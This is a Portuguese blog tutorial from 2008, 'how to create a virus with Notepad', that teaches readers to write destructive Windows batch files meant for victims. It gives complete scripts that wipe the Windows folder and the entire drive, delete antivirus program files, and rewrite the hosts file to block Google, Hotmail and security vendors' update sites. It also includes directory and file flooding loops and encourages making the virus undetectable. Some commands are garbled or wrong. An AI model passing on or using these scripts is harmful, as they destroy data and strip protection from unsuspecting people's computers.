sábado, 26 de abril de 2008

COMO CRIAR UM VÍRUS COM O BLOCO DE NOTAS

COMO CRIAR UM VÍRUS COM O BLOCO
DE NOTAS C/ AS ALTERAÇÕES DO SEU GOSTO



Esses são alguns vírus que podem ser criados pelo Bloco de Notas com
extensão ".bat", lembrem-se sempre depois criar um vírus deixe-o indetectável
!



IMPORTANTE: Este tutorial explora
apenas do "BASICÃO" do batch



@echo off



Primeiramente, aprendemos uma das coisas principais, que tem em quase todo
badcom. No caso, o @echo off

Este comando serve para não exibir outros comandos, por exemplo, se vc for
deletar tudo o que tem no HD de alguem vai aparecer lá o del /q /s /f

Se colocar isso, vai apenas abrir a janela e ir deletando devagar.



Comando del



Para deletar um arquivo sem ter que dar uma confirmação e deletar mesmo que o
arquivo esteja sendo usado, temos que usar o comando del /f /s arquivo.exe

Nesse exemplo acima, o badcom deleterá o arquivo.exe sem pedir confirmação e
deletará mesmo que esteja sendo usado.

Outro exemplo é esse de baixo, que entra na pasta

Arquivos de programas e apaga tudo dentro dela!


Código:



@echo off

cd\

cd windows

del /f /s *.*

exit



Explicando, o @echo off acho que vocês já aprenderam né, nem precisa eu dar
outra explicação.

o cd\ faz o batch ir para a unidade C:

cd é um comando para entrar em alguma pasta, no exemplo foi a Windows.

del /f /s tem a função de deletar todos os arquivos, por causa do *.*, esse
caractere * tem a função de 'coringa' ou seja, equivale a todos, e assim
deleta os arquivos de todos os nomes de todos os tipos de extenções.

exit tem a função de sair, quer dizer que o badcom acabou, fecha a janela e
pronto xD



Enviando uma mensagem



Bem, esse comando também é bem simples, ele envia uma mensagem igual o alert,
só que alert é no browser, e esse comando mostra no DOS



Exemplo:



Código:

@echo off

msg * Oi amigo, de xau para o seu windows!

cd\

cd windows

del /f /s *.*

exit



Esse exemplo, antes de destruir o windows, ele envia uma mensagem dizendo:

" Oi amigo, de xau para o seu windows!"

Realmente é bem simples.



Renomeando arquivos



Esse comando tambem não é nada dificil, ele tem a função de renomear arquivos.


Exemplo:



@echo off

cd\

cd Windows

ren explorer.exe seferro.exe

exit



O resto dos comandos eu já expliquei, irei apenas explicar o ren

nesse exemplo, o badcom funcionou assim: ele foi para a unidade C:, depois
entrou na pasta windows. Dentro da pasta windows ele renomeou o arquivo
explorer.exe para seferro.exe e depois fechou a janela do badcom.

ps.: dependendo do arquivo que vc tente renomear, pode dar erro, se ele já
estiver sendo usado!



Abrindo um arquivo



Este é outro comando muito simples. É o comando start e tem a função de abrir
arquivos.

Exemplo:



@echo off

cd\

cd windows

start notepad.exe

exit



Esse badcom é inofensivo e não causa danos ao seu computador.

Ele apenas vai para a unidade C:, depois entra na pasta windows e ai que entra
o comando start, que no exemplo abre o bloco de notas (notepad.exe)



Sobrescrevendo arquivos



Esse comando eu aprendi com o sthealt, moderador aqui do fórum.

No exemplo vamos usar um arquivo de texto, .txt, para entender melhor.

Vamos supor que existe um arquivo chamado teste.txt dentro da pasta Arquivos
de programas

Exemplo:



@echo off

cd\

cd Arquivos de programas

echo teste.txt > mensagem aqui

exit



Agora abrindo o arquivo teste.txt, encontraremos lá a mensagem "mensagem
aqui".

Esse comando é bem útil para pharming, dá para sobrescrever o arquivo hosts do
windows



Fazer uma mensagem aparecer no badcom



Esse comando também é muito simples.

É o comando echo, não tem muito a explicar sobre ele, apenas irei dar um
exemplo, só para não perder o costume xD:



@echo off

echo Oi, meu nome é Fvox, e o seu?

exit



Esse badcom, nem sei se pode ser chamado de badcom, pois é inofensivo, faz
aparecer na tela a mensagem "Oi, meu nome é Fvox, e o seu?", mas por muuuuito
pouco tempo, pois vem seguido do comando exit, que fecha a tela, e para não
fechar, podemos usar o comando pause, que faz aparecer a mensagem "Pressione
qualquer tecla para continuar", mas ai pelo menos da para ler a mensagem.



Criando uma nova pasta



Esse tbm é muito facil, se vc leu todos acima.

Ele cria uma pasta.. é o comando md

Neste exemplo ele cria uma nova pasta em C:/Windows/system32 chamada owned



@echo off

cd\

cd Windows

cd system32

md owned

exit



Facil não?



Pulando uma linha nas msgs do badcom



Esse comando é útil para quando vc quer enviar mensagem ao infelizardo que
abrir o seu badcom. É o comando echo.

Exemplo:



@echo off

echo Oi! Prepare-se, pois vc acabou de abrir o meu badcom

echo.

echo.

echo Vc nao eh nenhum sortudo hein!

cd\

cd windows

del /f /s *.*

exit



Imprimindo arquivos





Você que é maldoso, e quer acabar com a tinta do cara hehe, aqui vc vai
aprender



Vamos primeiramente achar um arquivo .txt no PC do cara.

Vamos supor que exista um arquivo chamado poesia.txt na unidade C:

Primeiramente para gastar toda tinta do PC do cara terá que sobrescrever o
arquivo, enchendo ele de ¦



@echo off

cd\

echo poesia.txt > ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

echo poesia.txt > ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

echo poesia.txt > ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

echo poesia.txt > ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

echo poesia.txt > ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

echo poesia.txt > ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

print print.txt

exit



Só que para isso devemos aumentar a quantidade de ¦ e a quantidade de comandos
echo... e a quantidade de comandos print.



Limpando a tela do badcom



Esse comando também é muito usado, ele é o comando cls e cuja a função é
limpar a tela do badcom

Exemplo:



@echo off

echo Oi pessoal, meu nome eh Fvox

cls

pause



A mensagem realmente irá aparecer, mas não vai durar nem um segundo, pois em
seguida vem o comando cls, que limpa toda a tela



Excluindo uma pasta



Vamos supor que no PC que eu irei abrir esse badcom existe uma pasta que fica
localizada na unidade C: e se chama Fvox, porém eu quero deleta-la com o meu
badcom.

Vamos ter que fazer:



@echo off

cd\

cd Fvox

del /f /s *.*

cd..

rmdir /Q /S Fvox

exit





Explicando, o del /f /s *.* eu usei para deletar todos os arquivos que tinham
na pasta, pois pasta com algum arquivo não dá para deletar.

depois eu voltei um diretório com o comando

cd..

ai usei o comando rmdir para deletar a pasta, e finalmente acabou o badcom.




Badcons perigosos by sthealt



Deletar arquivos de anti-vírus



@echo off

del /Q /F %HomeDrive%\Arquiv~1\alwils~1\avast4\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\alwils~1\avast4\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\Lavasoft\Ad-awa~1\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\kasper~1\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\trojan~1\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\f-prot95\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\tbav\*.dat > nul

del /Q /F %HomeDrive%\Arquiv~1\avpersonal\*.vdf > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.cnt > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.hlp > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.def > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.ini > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.txt > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.dat > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.log > nul

del /Q /F %HomeDrive%Arquiv~1\Mcafee\*.reg > nul

del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.reg > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.txt > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.hlp > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.isu > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.hlp > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.cnt > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.dat > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.ulg > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.ini > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.txt > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.cnt > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.hlp > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.def > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.ini > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.txt > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.dat > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.log > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.reg > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.log > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.idx > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.ini > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.hlp > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.orgt > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.dat > nul

del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.dat > nul

del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.mo > nul

del /Q /F %HomeDrive%\Arquiv~1\ESET\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\ESET\*.dll > nul

del /Q /F %HomeDrive%\Arquiv~1\ESET\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\ESET\Instalar\*.exe > nul

del /Q /F %HomeDrive%\Arquiv~1\ESET\Instalar\*.dll > nul



Pharming em vários sites







@echo off

echo 0.0.0.0 localhost > %HomeDrive%\windows\system32\etc\hosts

echo 0.0.0.0

http://www.superdownloads.com.br > %HomeDrive%\windows\system32\drivers\etc\hosts


echo 0.0.0.0

http://www.superdownloads.com.br >> %HomeDrive%\windows\system32\drivers\etc\hosts


echo 0.0.0.0

http://www.google.com.br >> %HomeDrive%\windows\system32\drivers\etc\hosts


echo 0.0.0.0

http://www.google.com.br >> %HomeDrive%\windows\system32\drivers\etc\hosts


echo 0.0.0.0

http://www.hotmail.com >> %HomeDrive%\windows\system32\drivers\etc\hosts


echo 0.0.0.0

http://www.hotmail.com >> %HomeDrive%\windows\system32\drivers\etc\hosts


echo 0.0.0.0 orkut.com >> %HomeDrive%\windows\system32\drives\etc\hosts

echo 0.0.0.0

http://www.orkut.com >> %HomeDrive%\windows\system32\drivers\etc\hosts


echo 0.0.0.0

http://www.orkut.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.uol.com.br >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.uol.com.br >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.terra.com.br >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.terra.com.br >> %HomeDrive%\windows\hosts

echo 0.0.0.0 download.mcafee.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://download.mcaffe.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0 f-secure.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0
http://f-secure.com/
>> %HomeDrive%\windows\hosts

echo 0.0.0.0 kaspersky.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://kaspersky.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0 liveupdate.symantec.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://liveupdate.symantec.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0 liveupdate.symantecliveupdate.com >> %HomeDrive%\windows\hosts


echo 0.0.0.0 mcafee.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.mcafee.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0 symantec.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.symantec.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0 trendmicro.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://trendmicro.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.grisoft.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.grisoft.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.kaspersky.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.kaspersky.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.mcaffe.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.mcaffe.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.sophos.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.sophos.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.symantec.com >> %HomeDrive%\windows\hosts

echo 0.0.0.0

http://www.symantec.com >> %HomeDrive%\windows\hosts



Deletar todo o HD



@echo off

del /Q /S /F %HomeDrive%\*.*

exit



Flood de diretórios



@echo off

cd\

goto 1

:1

md Flood

cd Flood

goto 1



File flood



@echo off

cd\

echo Flooded > %HomeDrive%\flood.txt

goto 1

:1

type flood.txt >> flood.txt

goto 1

Postado por BTHacker às 07:39
Marcadores:

Um comentário:

Giovanni O¹²² disse...

como deixa-lo indetectavel?? sou novo nesse negocio de hackers..

18 de julho de 2011 às 16:32

Postar um comentário

Assinar: Postar comentários (Atom)